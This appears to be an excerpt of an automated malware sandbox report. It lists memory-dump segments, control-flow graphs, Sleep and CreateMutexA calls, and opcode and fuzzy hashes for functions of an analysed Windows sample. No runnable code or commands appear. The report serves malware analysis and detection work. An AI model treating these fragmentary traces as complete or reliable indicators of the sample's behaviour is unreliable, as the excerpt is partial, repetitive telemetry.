                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: 16624a578d7efb245c59c73bf4ecdbff5a1ba5526fd3c8ab9a8b1f6a78779d1c
                                                                                                                                                                                                                                                    • Instruction ID: be34a108733cf2d7e5e7a69dd44cb141dbc4443828e694290b4789879a4d494d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16624a578d7efb245c59c73bf4ecdbff5a1ba5526fd3c8ab9a8b1f6a78779d1c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E313D31B00204ABEB1CDB78DD8976DB761DFD6310F24C219E019973D5D73999818B63
                                                                                                                                                                                                                                                    Function 00A79A0C Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 439 a79a0c-a79a18 440 a79a2e-a79cc1 call a8d593 call a87870 call a75b20 call a78a60 call a88150 call a87870 call a75b20 call a78a60 call a88150 439->440 441 a79a1a-a79a28 439->441 441->440 442 a7a847 441->442 444 a7a883-a7a8c4 Sleep CreateMutexA 442->444 445 a7a847 call aa6b9a 442->445 450 a7a8d7-a7a8d8 444->450 451 a7a8c6-a7a8c8 444->451 445->444 451->450 454 a7a8ca-a7a8d5 451->454 454->450
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: 8d92b1a7ff52bae100005ff4fc5d193be5c27bab9a0b1f9ca47f1ab69188da2a
                                                                                                                                                                                                                                                    • Instruction ID: 52375e731affd503f0a647ee140a46365682b5f51b80de6d4c3faaebed6156a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d92b1a7ff52bae100005ff4fc5d193be5c27bab9a0b1f9ca47f1ab69188da2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC219131B04200A7EB1C9B78DC8976DB3A1EBD5310F10C22DE41D873D5D73594828B12
                                                                                                                                                                                                                                                    Function 00A7A27F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 484 a7a27f-a7a28b 485 a7a2a1-a7a2ca call a8d593 484->485 486 a7a28d-a7a29b 484->486 492 a7a2cc-a7a2d8 485->492 493 a7a2f8-a7a846 call a87f30 485->493 486->485 487 a7a86a 486->487 490 a7a883-a7a8c4 Sleep CreateMutexA 487->490 491 a7a86a call aa6b9a 487->491 498 a7a8d7-a7a8d8 490->498 499 a7a8c6-a7a8c8 490->499 491->490 495 a7a2ee-a7a2f5 call a8d593 492->495 496 a7a2da-a7a2e8 492->496 495->493 496->487 496->495 499->498 502 a7a8ca-a7a8d5 499->502 502->498
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: a6d65de8d84304b8e87c5663d23edb571d143bc0af322d58a254857abdffa1eb
                                                                                                                                                                                                                                                    • Instruction ID: b2789bfb119925eb6b626fedcb828283745d92b41b5a01a5d4336bf94f1ec026
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6d65de8d84304b8e87c5663d23edb571d143bc0af322d58a254857abdffa1eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C214F31704200A7EB1CDB68DD8976DF7A2EBE5311F20C229E4099B3D5D77595818753
                                                                                                                                                                                                                                                    Function 00A7A786 Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 507 a7a786-a7a79e 508 a7a7a0-a7a7ac 507->508 509 a7a7cc-a7a7ce 507->509 512 a7a7c2-a7a7c9 call a8d593 508->512 513 a7a7ae-a7a7bc 508->513 510 a7a7d0-a7a7d7 509->510 511 a7a7d9-a7a7e1 call a77d00 509->511 516 a7a81b-a7a846 call a87f30 510->516 524 a7a814-a7a816 511->524 525 a7a7e3-a7a7eb call a77d00 511->525 512->509 513->512 514 a7a87e 513->514 520 a7a883-a7a8b7 Sleep CreateMutexA 514->520 521 a7a87e call aa6b9a 514->521 526 a7a8be-a7a8c4 520->526 521->520 524->516 525->524 532 a7a7ed-a7a7f5 call a77d00 525->532 528 a7a8d7-a7a8d8 526->528 529 a7a8c6-a7a8c8 526->529 529->528 531 a7a8ca-a7a8d5 529->531 531->528 532->524 536 a7a7f7-a7a7ff call a77d00 532->536 536->524 539 a7a801-a7a809 call a77d00 536->539 539->524 542 a7a80b-a7a812 539->542 542->516
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00A7A893
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00AD3224), ref: 00A7A8B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                                                                                                    • Opcode ID: e66f68eedea5eac0df891b3e9026840cd0856c5919b9719d62d68f33eed019f3
                                                                                                                                                                                                                                                    • Instruction ID: e61c6eb27ee2136ed28d15b0bc0cd54813a915bb6c0796a579954c4273f469f9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66f68eedea5eac0df891b3e9026840cd0856c5919b9719d62d68f33eed019f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB212B3174820076EB386768DD4AB3D7261AFE6700F24C829E00DD63D2DA798841C6A3
                                                                                                                                                                                                                                                    Function 00A77D00 Relevance: 1.9, APIs: 1, Instructions: 392COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
